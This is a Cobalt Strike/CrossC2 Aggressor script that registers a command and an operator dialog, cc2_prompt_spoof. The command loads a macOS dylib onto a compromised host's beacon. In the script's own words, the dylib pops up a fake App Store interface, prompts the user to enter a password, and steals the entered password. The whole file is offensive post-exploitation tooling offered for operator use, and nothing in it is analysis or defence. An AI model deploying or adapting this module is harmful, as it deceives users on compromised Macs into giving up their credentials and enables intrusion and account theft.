
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_prompt_spoof {
    blog($1, "\nUsage: cc2_prompt_spoof <process display name>\nEx:\n\tcc2_prompt_spoof osx English");
}

sub cc2_prompt_spoof {
    $taskName = "cc2_prompt_spoof"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info"; # info -> normal message

    $beaconid = $1;
    $displayName = $2;
    $transportArg = $displayName."^";

    $os = lc(beacon_info($beaconid, "os"));

    if ('macos' isin $os) {
        $loadlib = "gather/prompt/osx/cc2_prompt_spoof.dylib_bk";
    } else {
        berror($beaconid, "*[error]: Only supports osx.");
        printUsage_prompt_spoof($beaconid);
        return;
    }
    if ($displayName) {
        blog($beaconid, "cc2_prompt_spoof: " . $displayName);
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_prompt_spoof($beaconid);
    }

}

ssh_alias("cc2_prompt_spoof", &cc2_prompt_spoof);

ssh_command_register("cc2_prompt_spoof", "CrossC2 prompt_spoof - (AppStore) interface pops up and prompts the user to enter a password, stealing the entered password", "\nUsage: cc2_prompt_spoof <process display name>\nEx:\n\tcc2_prompt_spoof English");


sub openPromptSpoofDialogCallBack {
    $bid = $3['bid'];
    $processName = $3['processName'];
    binput($bid, "cc2_prompt_spoof $processName");
    cc2_prompt_spoof($bid, $processName);
}

sub openPromptSpoofDialog {
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("CrossC2 prompt_spoof", %(bid => $bid[0], processName => "English"), &openPromptSpoofDialogCallBack);
    dialog_description($dialog, "(AppStore) interface pops up and prompts the user to enter a password, stealing the entered password");

    drow_text($dialog, "processName", "ProcessDisplay: ", 20); 

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}


sub cc2_prompt_spoof_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}